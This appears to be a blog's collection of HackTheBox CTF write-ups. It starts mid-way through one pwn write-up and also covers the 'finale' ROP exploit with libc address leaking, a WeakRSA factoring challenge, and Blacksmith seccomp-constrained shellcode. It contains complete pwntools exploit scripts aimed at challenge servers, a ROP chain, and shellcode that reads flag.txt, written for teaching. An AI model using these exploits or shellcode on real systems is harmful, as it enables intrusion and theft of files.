payload += p64(0x4014e0)  # read() -> write()
p.sendafter(b"next year: ", payload)
The Python representation of the ROP chain
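
The layout of each stage (64 bytes of buf, the saved RBP, then the chain starting at offset 0x48) can be checked without the binary. This is a sketch with the standard library only: build_stage is a hypothetical helper, p64 is a stand-in for pwn.p64, and the leak value is a placeholder because the real one comes from the running process.

```python
import struct

BUF_SIZE = 0x40       # size of buf in finale()
RET_OFFSET = 0x48     # offset from buf to the saved return address
POP_RDI = 0x4012D6    # pop rdi; ret
POP_RSI = 0x4012D8    # pop rsi; ret
READ_CALL = 0x4014E0  # call read@plt inside main()


def p64(value: int) -> bytes:
    """Pack an unsigned 64-bit little-endian value (stand-in for pwn.p64)."""
    return struct.pack("<Q", value)


def build_stage(prefix: bytes, saved_rbp: int, chain: list) -> bytes:
    """Fill buf, overwrite the saved RBP, then lay out the chain."""
    padding = b"A" * (BUF_SIZE - len(prefix))
    return prefix + padding + p64(saved_rbp) + b"".join(p64(v) for v in chain)


# Placeholder values: the real leak comes from the "souvenir" line.
leak = 0x7FFC887475A0
rbp = leak - 0x5000

stage2 = build_stage(b"flag.txt\0", rbp,
                     [POP_RDI, 3, POP_RSI, rbp - 0x20, READ_CALL])
first_gadget = struct.unpack_from("<Q", stage2, RET_OFFSET)[0]
print(len(stage2), hex(first_gadget))
```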

Retrieving the flag

So, the final script is:

#!/usr/bin/env python3
from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
is_remote = False
if is_remote:
    p = remote("167.99.204.5", 31431)
else:
    p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x4012d6)

# 0x004012d8: pop rsi; ret;
pop_rsi = p64(0x4012d8)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)
    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))

p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read
leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

file = b'flag.txt\0'
rbp = leak - 0x5000

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(leak)
payload += pop_rsi + p64(0)
payload += p64(e.plt.open)
payload += p64(e.sym.finale)  # set RDX
p.sendafter(b"next year: ", payload)

payload = file + b'A'*(0x40-len(file)) + p64(rbp)
payload += pop_rdi + p64(3)
payload += pop_rsi + p64(rbp-0x20)
payload += p64(0x4014e0)  # read() -> write()
p.sendafter(b"next year: ", payload)

while True:
    print(p.recv())

Failed attempt

In my failed attempt I tried to get remote code execution using leaked libc offsets, but it turned out that the libc version on the server was custom and it was intended to prevent this solution. I had to find out by asking the creator of the challenge.

The way we leak libc addresses is by calling puts() in the PLT section with the argument being a libc function linked in the GOT section. So, we need to call puts(const char *string); with argument string via the RDI register in AMD64. To control the RDI register, we use a ROP chain that pops RDI:

$ ropr -R 'pop rdi; ret;' challenge/finale
0x004012d6: pop rdi; ret;

==> Found 1 gadgets in 0.004 seconds

Now we can pop a GOT function address into RDI and call puts() to leak the function offset. Let's run the following script with the server as target to get their libc version:

#!/usr/bin/env python3
from pwn import ELF, remote, gdb, p64, u64
import time

e = ELF('challenge/finale')
is_remote = False
if is_remote:
    p = remote("161.35.173.232", 31394)
else:
    p = e.process()

# 0x004012d6: pop rdi; ret;
pop_rdi = p64(0x004012d6)

def leak_func(address):
    payload = b'A'*0x48
    payload += pop_rdi + p64(address) + p64(e.plt.puts) + p64(e.sym.finale)
    p.sendafter(b"next year: ", payload)
    p.recvuntil(b"you!\n\n")  # clear buffer
    return u64(p.recvuntil(b"\n")[:-1].ljust(8, b'\x00'))

p.sendlineafter(b"secret phrase: ", b"s34s0nf1n4l3b00")
p.recvuntil(b"good luck: [")  # clear buffer for next address read
leak = int(p.recvuntil(b"]")[:-1], 16)
print("leak @", hex(leak))

#gdb.attach(p)
for name, addr in e.got.items():
    print(name, "@", hex(leak_func(addr)))
The payload for leaking LIBC addresses

The output is the following:

__libc_start_main @ 0x7ff2d7c29dc0
__gmon_start__ @ 0x0
stdout @ 0x7ff2d7e1a780
stdin @ 0x7ff2d7e19aa0
strncmp @ 0x0
puts @ 0x7ff2d7c80ed0
write @ 0x7ff2d7d14a20
printf @ 0x7ff2d7c60770
alarm @ 0x7ff2d7cea5b0
close @ 0x0
read @ 0x7ff2d7d14980
srand @ 0x7ff2d7c460a0
time @ 0x7ffdaafcfc60
fflush @ 0x7ff2d7c7f1b0
setvbuf @ 0x7ff2d7c81670
open @ 0x7ff2d7d14690
__isoc99_scanf @ 0x7ff2d7c62110
rand @ 0x7ff2d7c46760

When I enter those symbols and addresses into a libc-leak website like libc.rip, I cannot find a single libc version. That means that there's a custom libc version, which means we can't call system() since we don't have the address.
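
As a side note, what identifies a libc build in such a lookup is the page offset of each symbol, since the upper bits change with ASLR on every run. A small sketch that extracts those offsets from a few of the leaks above (page_offset is a hypothetical helper name):

```python
# A few of the leaked addresses from the output above.
leaks = {
    "puts": 0x7FF2D7C80ED0,
    "printf": 0x7FF2D7C60770,
    "read": 0x7FF2D7D14980,
    "open": 0x7FF2D7D14690,
}


def page_offset(address: int) -> int:
    """Lowest 12 bits of an address, which ASLR leaves untouched."""
    return address & 0xFFF


for name, address in leaks.items():
    print(f"{name}: {page_offset(address):03x}")
```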

24 Nov

WeakRSA (HackTheBox)

G'day everyone! In this write-up we are going to solve the retired WeakRSA challenge on Hack The Box. In order to do so, however, it is important that you understand some of the basics. You will learn:

  • Basic RSA
  • Decoding pem formats

How does RSA work?

RSA is an encryption algorithm which has been around since 1977. To use it you will need to choose two different large prime numbers, which will be named p and q.

By multiplying p and q together you get your modulus, named N. Then you can choose your exponent, which we will name e. Now you are ready to encrypt your secret message. Using RSA, our encrypted message will be calculated like this: (message^e) mod N

In Python 3 it can be computed like this:

pow(message,e,N)

Decrypting RSA

Decrypting will be a little bit harder. To do so we first must find phi, φ(N). We can do so like this: φ(N) = (p-1) * (q-1).

Remember that we need to know p and q to decrypt; this is important. We are finally ready to calculate d, the modular inverse of e modulo φ(N). This can be done by using the extended Euclidean algorithm. You don't have to understand how (or why) it works but saying it will make you look smart. In Python I use xgcd from the libnum library. d will be the first value the algorithm outputs (reduce it modulo φ(N) if it comes out negative).

d = xgcd(e,φN) [0]

 The plaintext can then be calculated :

plaintext = pow(encrypted, d, N)
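
To see all of the steps together, here is a toy round trip with tiny textbook primes. It is a sketch, not the challenge solution: the local xgcd is a stand-in for libnum's so the example runs without extra libraries, and the parameters are far too small for real use.

```python
def xgcd(a: int, b: int):
    """Extended Euclid: return (x, y, g) with a*x + b*y == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return x0, y0, a


# Toy parameters, far too small for real use.
p, q, e = 61, 53, 17
N = p * q
phi = (p - 1) * (q - 1)

d = xgcd(e, phi)[0] % phi  # reduce in case the coefficient is negative

message = 65
encrypted = pow(message, e, N)
plaintext = pow(encrypted, d, N)
print(N, phi, d, plaintext)
```

On Python 3.8 and newer, pow(e, -1, phi) computes the same d without a helper function.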

Solving the challenge

After downloading and extracting the zip we get a key encoded in the pub format. We can decode it using Python or just by using an online tool, which gives us the following data:

The modulus is the public key N and the public exponent is our e.

We know that the modulus is just p * q but it will take forever to factor such a large number. If only there was a quicker method. Wait a minute, what if there are databases containing the factors of large numbers… That would be really helpful. After some searching I encountered this site. Let's try to input our N:

Looks like we found p and q. From here we can get the flag using Python:
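A script for this step could look roughly like the sketch below. It assumes the ciphertext is the raw big-endian encoding of (message^e) mod N without padding. The function name `decrypt_with_factors` and all demo values are placeholders for illustration, not the challenge's key or factors. Fed with the real N, e, p, q and ciphertext, it would print the flag.

```python
def decrypt_with_factors(n, e, p, q, ciphertext):
    """Recover the plaintext bytes once the factors p and q of n are known."""
    if p * q != n:
        raise ValueError("p and q are not the factors of n")
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                     # private exponent (Python 3.8+)
    c = int.from_bytes(ciphertext, "big")   # ciphertext bytes -> integer
    m = pow(c, d, n)                        # textbook RSA decryption
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

# Placeholder key built from two known Mersenne primes (demo only).
p = 2**61 - 1
q = 2**89 - 1
n = p * q
e = 65537

# Encrypt a stand-in message so there is something to decrypt.
secret = b"HTB{toy}"
ciphertext = pow(int.from_bytes(secret, "big"), e, n).to_bytes(19, "big")

print(decrypt_with_factors(n, e, p, q, ciphertext))
```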

The script should output the flag:

HTB{s1mpl3_Wi3n3rs_4tt4ck}

The lesson this challenge is trying to teach us is that p and q should be above 512 digits. This way the public key is less likely to be factorized, so p and q can't be found and your secret messages can't be decrypted.

20 Nov

Blacksmith (HackTheBox)

Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".

In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing AMD64 (x86_64) assembly
  • Retrieving the flag

First looks

We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:

$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
The program output

Usually, I start by checking the binary's security using pwntools' checksec. In this case, the security of the blacksmith binary is:

$ checksec blacksmith
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
The checksec output

The fields in checksec mean the following:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, …)
  • RELRO: Relocation Read-Only – secures the dynamic linking process
  • Stack: stack canaries – protect against stack buffer overflow attacks
  • NX: No eXecute – writable memory cannot be executed
  • PIE: Position Independent Executable – address randomization
  • RWX: Read Write Execute – there's memory that's RWX

The logical conclusion is that we need to write a shellcode to the RWX memory to read out flag.txt (based on the challenge description).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:

  • an information leak primitive to leak an address
  • an arbitrary write primitive to control the execution flow

… which can work together by controlling the execution flow by writing a leaked address.

Main analysis

When I want to find vulnerability primitives, I open the binary in Ghidra, a reverse engineering tool developed by the NSA (yes, that NSA). I start analyzing a binary at the main function. In this case, it looked like the following:

void main(void)
{
  size_t __n;
  long in_FS_OFFSET;
  int i_has_things;
  int i_option;
  char *local_20;
  char *local_18;
  long __can_token;

  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  // ...
  __isoc99_scanf("%d",&i_has_things);
  if (i_has_things != 1) {
    puts("Farewell traveler! Come back when you have all the materials!");
    exit(34);
  }
  printf(s_What_do_you_want_me_to_craft?_1._001012e0);
  __isoc99_scanf("%d",&i_option);
  sec();
  if (i_option == 2) {
    shield();
  }
  else if (i_option == 3) {
    bow();
  }
  else if (i_option == 1) {
    sword();
  }
  else {
    write(STDOUT_FILENO,local_18,strlen(local_18));
    exit(261);
  }
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
Decompilation of the main function

So, the main function does the following:

  1. setup()
  2. sec()
  3. shield(), bow() or sword()

In addition to that, the main function uses a stack canary, stored in the variable __can_token. As you can see, if __can_token no longer equals the original value, stack corruption has been detected, and __stack_chk_fail is called, which aborts the program.

The setup function disables buffering for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.

Sec function

void sec(void)
{
  void* ctx;
  long in_FS_OFFSET;
  long __can_token;

  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  // ...
  // allow sys_read, sys_write,
  // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
The sec function

We can see that the sec function primarily uses seccomp to create an allow list of the syscalls sys_read, sys_write, sys_open, and sys_exit. (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from spawning a shell on the server, since we would need to call sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.
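The magic numbers in sec() can be decoded by hand. In libseccomp's headers, 0x7fff0000 is SCMP_ACT_ALLOW and 0 is SCMP_ACT_KILL, so seccomp_init(0) kills on anything that is not explicitly allowed. The sketch below is only a model of that filter in Python, not a real seccomp binding; the names `SYSCALL_NAMES`, `RULES` and `is_allowed` are made up for illustration.

```python
# Action constants as defined in libseccomp's seccomp.h.
SCMP_ACT_KILL = 0x00000000
SCMP_ACT_ALLOW = 0x7fff0000

# x86_64 syscall numbers that matter for this challenge.
SYSCALL_NAMES = {0: "read", 1: "write", 2: "open", 59: "execve", 60: "exit"}

# Default action passed to seccomp_init() and the (action, syscall) rules
# in the order sec() adds them.
DEFAULT_ACTION = 0
RULES = [(0x7fff0000, 2), (0x7fff0000, 0), (0x7fff0000, 1), (0x7fff0000, 60)]

def is_allowed(syscall_nr, default_action=DEFAULT_ACTION, rules=RULES):
    """Model of the filter: a matching rule wins, otherwise the default applies."""
    for action, nr in rules:
        if nr == syscall_nr:
            return action == SCMP_ACT_ALLOW
    return default_action == SCMP_ACT_ALLOW

for nr, name in sorted(SYSCALL_NAMES.items()):
    verdict = "allowed" if is_allowed(nr) else "killed"
    print(f"sys_{name} ({nr}): {verdict}")
```

In this model, sys_execve (59) falls through to the default action and is killed, which matches the conclusion above.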

Shield analysis

Furthermore, we have the shield(), bow() or sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which means they are irrelevant. So basically, the vulnerability must be in shield().

void shield(void)
{
  size_t strlen;
  long in_FS_OFFSET;
  char buf[72];
  long __can_token;

  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
  write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
  strlen = ::strlen("Do you like your new weapon?\n> ");
  write(1,"Do you like your new weapon?\n> ",strlen);
  read(0,buf,63);
  (*(code *)buf)();
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}
The shield function

What sticks out to me in this function is that we have user input and are calling a variable like a function using (*(code *)buf)();. The code (*(code *)buf)(); is equivalent to the ASM below:

00100dd9 48 8d 55 b0     LEA  RDX, [RBP - 0x50]  ; code* RDX = &buf
00100ddd b8 00 00 00 00  MOV  RAX, 0x0
00100de2 ff d2           CALL RDX                ; RDX()
ASM version of (*(code *)buf)();

The (*(code *)buf)(); call executes the bytes stored in buf on the stack as if they were machine code. This means we can inject our own assembly into the program.

Developing AMD64 (x86_64) assembly

We have an arbitrary execution primitive so we need to write an assembly payload. The difficulty with this is that:

  • We have 63 bytes to work with:
    // shield() function
    read(STDIN_FILENO,buf,63);
    (*(code *)buf)();
Part of the shield() function
  • We can only use sys_read, sys_write, sys_open and sys_exit:
    // sec() function
    // allow sys_read, sys_write,
    // sys_open, sys_exit
    ctx = seccomp_init(0);
    seccomp_rule_add(ctx,0x7fff0000,2,0);
    seccomp_rule_add(ctx,0x7fff0000,0,0);
    seccomp_rule_add(ctx,0x7fff0000,1,0);
    seccomp_rule_add(ctx,0x7fff0000,60,0);
    seccomp_load(ctx);
Part of the sec() function
  • We do not have a stack address (ASLR)

However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.

To interact with those files, we need to utilize system calls ("syscalls"). Syscalls are essentially an ABI (binary API) with the Linux kernel, which is like the god of the operating system. The kernel provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent starting point (I've read it).

I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:

// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0);
// sys_read(int fd, char* buf, size_t count)
int written = sys_read(fd, buf, 0x9999);
// sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, written);
C pseudocode of the ASM payload
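Before dropping down to assembly, the same open/read/write sequence can be tried from Python with the os module. This is only an illustration of the flow. `dump_file` is a made-up helper, the demo file is a stand-in, and the Python runtime may use different syscalls under the hood (for example openat instead of open). The final payload also has no equivalent of os.close, since close is not on the allow list.

```python
import os
import tempfile

def dump_file(path, count=0x9999):
    """Open a file, read up to `count` bytes and write them to stdout."""
    fd = os.open(path, os.O_RDONLY)   # like sys_open(path, 0, 0); O_RDONLY is 0
    try:
        data = os.read(fd, count)     # like sys_read(fd, buf, count)
    finally:
        os.close(fd)                  # cleanup only; the payload skips this
    os.write(1, data)                 # like sys_write(1, buf, bytes_read)
    return data

# Demo with a stand-in flag file in a temporary directory.
with tempfile.TemporaryDirectory() as tmp:
    demo_path = os.path.join(tmp, "flag.txt")
    with open(demo_path, "wb") as handle:
        handle.write(b"HTB{placeholder}\n")
    dump_file(demo_path)
```

Note that the number of bytes returned by the read is what gets passed on to the write, just like in the pseudocode.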

I came up with the following ASM:

mov rax, 2
lea rdi, [rip+41] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall
mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Payload used to leak flag.txt

Since we have only 63 bytes to work with, I had to be creative. In assembly, most bytes are spent on constant values: an instruction like mov rax, 2 embeds the constant as a 4-byte immediate (0x00000002) and takes 7 bytes in total. That means we can save a lot of bytes by reusing register values.

I eventually refactored the payload into 46 bytes:

push r10
inc r10
mov rax, r10
lea rdi, [rip+31] ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall
mov rdx, rax
pop rax
mov rdi, rax
syscall
The final compressed ASM payload
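To see where the savings come from, the sizes of both payloads can be tallied per instruction. The sketch below uses hand-assembled encodings, which I assume match what an assembler such as the one behind pwntools' asm() emits. The helpers `size` and `filename_offset` are made up for illustration. It also checks that the rip-relative displacement in each lea points exactly past the last instruction, where flag.txt gets appended.

```python
# (mnemonic, hex encoding) pairs; encodings are hand-assembled assumptions.
ORIGINAL = [
    ("mov rax, 2",        "48c7c002000000"),
    ("lea rdi, [rip+41]", "488d3d29000000"),
    ("xor rsi, rsi",      "4831f6"),
    ("xor rdx, rdx",      "4831d2"),
    ("syscall",           "0f05"),
    ("mov rsi, rdi",      "4889fe"),
    ("mov rdi, rax",      "4889c7"),
    ("xor rax, rax",      "4831c0"),
    ("mov rdx, 30",       "48c7c21e000000"),
    ("syscall",           "0f05"),
    ("mov rdx, rax",      "4889c2"),
    ("mov rax, 1",        "48c7c001000000"),
    ("mov rdi, rax",      "4889c7"),
    ("syscall",           "0f05"),
]

COMPRESSED = [
    ("push r10",          "4152"),
    ("inc r10",           "49ffc2"),
    ("mov rax, r10",      "4c89d0"),
    ("lea rdi, [rip+31]", "488d3d1f000000"),
    ("xor rsi, rsi",      "4831f6"),
    ("xor rdx, rdx",      "4831d2"),
    ("syscall",           "0f05"),
    ("mov rsi, rdi",      "4889fe"),
    ("mov rdi, rax",      "4889c7"),
    ("xor rax, rax",      "4831c0"),
    ("mov rdx, r11",      "4c89da"),
    ("syscall",           "0f05"),
    ("mov rdx, rax",      "4889c2"),
    ("pop rax",           "58"),
    ("mov rdi, rax",      "4889c7"),
    ("syscall",           "0f05"),
]

def size(listing):
    """Total number of machine-code bytes in a listing."""
    return sum(len(bytes.fromhex(code)) for _, code in listing)

def filename_offset(listing):
    """Payload offset that the rip-relative lea resolves to."""
    position = 0
    for mnemonic, code in listing:
        raw = bytes.fromhex(code)
        position += len(raw)  # rip points at the next instruction
        if mnemonic.startswith("lea"):
            return position + int.from_bytes(raw[-4:], "little")
    raise ValueError("no lea instruction in listing")

for label, listing in (("original", ORIGINAL), ("compressed", COMPRESSED)):
    print(label, size(listing), "bytes, filename at offset", filename_offset(listing))
```

The 7-byte mov instructions with immediates are the expensive ones; replacing mov rdx, 30 and mov rax, 1 with register moves and a pop is what shrinks the payload.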

Retrieving the flag

Now that we have a working payload, we need to send it to the application. I made the following script using pwntools:

#!/usr/bin/python3
from pwn import remote, gdb, ELF, asm, context
import time

e = ELF('blacksmith')
is_remote = True
if is_remote:
    p = remote("64.227.36.64", 32615)
else:
    p = e.process()

context.binary = e.path  # set the pwntools context for asm()

p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2')  # get to shield()

payload = asm(f'''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall
mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall
mov rdx, rax
pop rax
mov rdi, rax
syscall''')

print(f"writing ASM with {len(payload)} bytes")

# payload = payload + filler + filename
payload += b"flag.txt"
print(f"writing ASM+filename with {len(payload)} bytes")

p.sendafter(b"weapon?\n> ", payload)
while True:
    print(p.recvline())
The final script used for sending the payload to the application